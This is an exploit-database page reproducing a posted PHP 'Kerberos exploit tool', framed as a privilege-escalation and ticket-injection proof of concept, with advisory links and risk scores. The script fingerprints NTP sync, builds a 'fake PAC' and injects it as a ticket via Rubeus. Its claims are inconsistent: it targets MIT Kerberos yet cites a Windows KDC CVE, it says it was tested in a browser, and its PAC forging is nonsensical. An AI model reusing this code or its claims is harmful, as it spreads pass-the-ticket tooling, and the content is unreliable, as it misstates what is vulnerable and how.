Kerberos 5-1.21.3 Privilege Escalation / Ticket Injection

🗓️ 07 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 311 Views

Kerberos V5-1.21.3 has a vulnerability that allows privilege escalation and ticket injection attacks.

Reporter	Title	Published	Views	Family All 30
0day.today	Windows Kerberos - Elevation of Privilege (MS14-068) Exploit	9 Dec 201400:00	–	zdt
GithubExploit	Exploit for CVE-2014-6324	26 Oct 202510:52	–	githubexploit
ATTACKERKB	CVE-2014-6324 - Microsoft Kerberos Checksum Validation Vulnerability	18 Nov 201400:00	–	attackerkb
Circl	CVE-2014-6324	18 Nov 201407:00	–	circl
CISA KEV Catalog	Microsoft Kerberos Key Distribution Center (KDC) Privilege Escalation Vulnerability	25 Mar 202200:00	–	cisa_kev
Check Point Advisories	Microsoft Windows Kerberos KDC Elevation of Privilege (MS14-068; CVE-2014-6324)	19 Nov 201400:00	–	checkpoint_advisories
CVE	CVE-2014-6324	18 Nov 201423:00	–	cve
Cvelist	CVE-2014-6324	18 Nov 201423:00	–	cvelist
Exploit DB	HackBack - A DIY Guide	17 Apr 201600:00	–	exploitdb
Huawei	Security Advisory - Privilege Elevation Vulnerability in Microsoft Windows Kerberos Key Distribution Center	9 Sep 202000:00	–	huawei

=============================================================================================================================================
    | # Title     : Kerberos V5-1.21.3 Privilege Escalation & Ticket Injection Tool Vulnerability                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://web.mit.edu/kerberos/                                                                                               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is written in PHP and aims to perform attacks on Kerberos via Ticket Injection and NTP Desync exploits. The code runs on Windows and Linux.
    
       (Related : https://packetstorm.news/files/id/180752/ Linked CVE numbers: CVE-2014-6324 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 66
    
    [+] PayLoad :
    
    <?php
    // Kerberos Exploit Tool
    // Supports Windows & Linux
    // Features: NTP desync, PAC manipulation, RC4-HMAC bypass, Ticket Injection
    // Author: Indoushka
    
    function check_os() {
        if (stripos(PHP_OS, 'WIN') !== false) {
            return "Windows";
        } elseif (stripos(PHP_OS, 'Linux') !== false) {
            return "Linux";
        } else {
            die("[!] Unsupported OS\n");
        }
    }
    
    // NTP Desync Exploit
    function check_ntp_sync($target) {
        $output = shell_exec("ntpq -p " . escapeshellarg($target) . " 2>&1");
        if ($output === null) {
            echo "[!] Failed to execute NTP query.\n";
            return;
        }
        if (strpos(strtolower($output), "unsynchronized") !== false) {
            echo "[*] Target NTP is desynchronized - Possible Exploit!\n";
        } else {
            echo "[-] Target is synchronized - Harder to exploit.\n";
        }
    }
    
    // Kerberos Ticket Injection
    function inject_ticket($ticket_data) {
        $os = check_os();
        if ($os == "Windows") {
            $ticket_path = "C:\\Windows\\Temp\\ticket.kirbi";
            file_put_contents($ticket_path, $ticket_data);
            $result = shell_exec("rubeus.exe ptt /ticket:" . escapeshellarg($ticket_path) . " 2>&1");
        } else {
            putenv("KRB5CCNAME=/tmp/krb5cc_0");
            $ticket_path = "/tmp/krb5cc_0";
            file_put_contents($ticket_path, $ticket_data);
            $result = shell_exec("klist -c " . escapeshellarg($ticket_path) . " 2>&1");
        }
        if ($result === null) {
            echo "[!] Ticket injection failed.\n";
        } else {
            echo "[+] Ticket successfully injected.\n";
        }
    }
    
    // Generate Fake PAC
    function generate_pac($user_sid, $domain) {
        return pack("V", 0x00020000) . $domain . $user_sid;
    }
    
    // Main Exploit Function
    function kerberos_exploit($target, $username, $password, $domain, $user_sid) {
        echo "[*] Targeting $target in domain $domain\n";
        check_ntp_sync($target);
        $pac = generate_pac($user_sid, $domain);
        inject_ticket($pac);
        echo "[+] Exploit completed. Check your privileges!\n";
    }
    
    // Example Usage
    $target_ip = "192.168.1.100";
    $user = "victim";
    $pwd = "password123";
    $domain_name = "DEMO.LOCAL";
    $user_sid = "S-1-5-21-1234567890-1234567890-1234567890-1000";
    kerberos_exploit($target_ip, $user, $pwd, $domain_name, $user_sid);
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

07 Mar 2025 00:00Current

7.9High risk

Vulners AI Score7.9

CVSS 29

CVSS 3.18.8

EPSS0.9035